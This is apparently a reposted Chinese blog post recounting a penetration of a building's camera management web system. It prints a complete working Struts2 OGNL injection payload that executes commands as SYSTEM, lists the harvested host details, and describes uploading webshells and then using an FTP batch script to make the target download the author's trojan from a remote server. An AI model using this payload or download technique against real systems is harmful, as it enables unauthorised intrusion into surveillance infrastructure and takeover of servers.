专栏首页晨星先生的自留地渗透某摄像头系统

渗透某摄像头系统

在工作中碰到了一个实战的渗透,同事们没有搞下,最后们我运气好弄下了。

实际上也是他们钻牛角尖了。

原因是这样,渗透某部门的摄像头管理系统。

不是类似什么busybox的嵌入式linux的命令执行。

这是个集成的摄像头web管理系统,可以监控整座大楼各个摄像头~

用的是某康~

Ok,D发给我了一个ip:12*.***.***.***

界面是这样的

url咋一看这不是撞了枪口么,struts2

12*.***.***.***/cms/login?service=http%3A%2F%2F12*.***.***.***%3A81%2Fvportal%2Fweb%2Fgateway%2Findex.action

Strust2漏洞在三八女神节那一天搅动了整个安全圈,让一些应急响应的哥们加班到半夜。虽然我不至于半夜,折腾了大半天也是到11点才走的。

以至于错过了给老妈,以及小时候疼我的一些女性长辈一些祝福….

加上CIA的黑客武器同一时间放出来,这种日子一年多来几次估计就GG了。

这里给出payload:

POST /cms/uploadlicenseFile.do HTTP/1.1

Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Host: 12*.***.***.***:8081

执行dir命令发现:UNC?说明这里存在映射,当前的路径不是web服务的路径。

用k8哥哥的工具直接获取了计算机的各项信息~~

nt authority\system

WebPath:D:\iVMS-7800\ivms_install\javaapps\ivms-lite\

OS.Type: Windows Server 2008 R2

OS.Arch: amd64

OS.Version: 6.1

UserName: WIN-68JQ6FB820C$

Domain: WORKGROUP

UserName: WIN-68JQ6FB820C$

Country: CN

上传了一个一句话木马、cmd马,各种马发现都不行。

被做了全局的限制,只要没有登录账户,都会被做了url的跳转

12*.***.***.***:8081/cms/one8.jsp

无论在哪个目录都做了url跳转,只要你想执行jsp。

无奈之下只能下载一套系统的走白盒测试。

网速太慢求助C牛,C牛有百度云会员,可以用在线解压哦,于是传了源码给我。

但是由于版本太老,没有什么收获。

他建议我在js目录下写入,但是没有写入权限。

一下是这个系统的结构,目录层次看图。

上图是我拿到整台服务器权限弄到的,至于我怎么拿到的呢。

各位看官听我细细道来。

首先呢,看这段payload,看不懂的同学也不要紧,jsp我也不大懂。

就是K8的作者他也不明白究竟是怎样的请求头上传的,POST、GET?

干脆他都写了,这也是我同事死磕的一点。

一直以为是get的字符限制导致了马儿上传失败。我用k8成功了他们去研究,但是研究出来了也是不能执行…

然后我发现用k8也是对木马有长度限制的,又不能执行。

百般无奈,试了N中办法,我突然开窍了。

测试FTP命令能不能使用,可以的话在远程的服务器上搭建一个FTP服务器,然后让目标机器下载。

凸凸凸,写了个批处理。

完了之后执行:D:\1.bat

Ok,将我的木马下载到这边。

服务器连接之。

这样我就成功了拿到目标的权限了。

本文分享自微信公众号 - 晨星先生(MoXuanIT),作者:vaf

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-03-11

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • DNS(下)之域传送漏洞

    lonelyvaf
  • 提权(2) windows权限分析

    lonelyvaf
  • finecmsV5.0.8写文件漏洞分析

    lonelyvaf
  • 从全球联接指数报告看华为的战略意图

    虽然华为HCC大会已经过去一段时间了,但是关于华为的讨论和热议一直在继续,在会上华为展示了自已高科技上的技术成果,还对外发布了自已从ICT到IT公司的定位,而最...

    人称T客
  • 【技巧】ionic3底部Tab居中圆形凸出按钮

    IT晴天
  • C++中的显式类型转化

      类型转化也许大家并不陌生,int i; float j; j = (float)i; i = (int)j; 像这样的显式转化其实很常见,强制类型转换可能会...

    弗兰克的猫
  • 如果华为现在请倪光南来华为搞芯片。华为会超过芯片巨头英特尔吗?

    这种问题可以拿来当作茶余饭后的谈点,但在实际研发过程中,芯片和操作系统这种核心级别的研发考验的不是单个人的能力,是对一个产业的验证,前些日子任正非老爷子在接受央...

    程序员互动联盟
  • 评估一款RPA工具的6大标准

    RPA(机器人流程自动化)技术能够企业带来高效率、高准确率、低成本的业务处理方式,正成为眼下企业降本增效的首选之一。如何选择一款合适的RPA工具?

    蕉黄
  • 4G网络刚覆盖,5G网络又开始建设了,4G会不会被淘汰?

    从心理上讲倒是希望4G真的被淘汰,这样国内的手机厂家还能少交点专利费用,现在的通讯的标准是向前兼容,现在不仅仅是4G,2G,3G也得继续支持,毕竟现在还有很多地...

    程序员互动联盟
  • Head First Python (一

    py3study

扫码关注云+社区

领取腾讯云代金券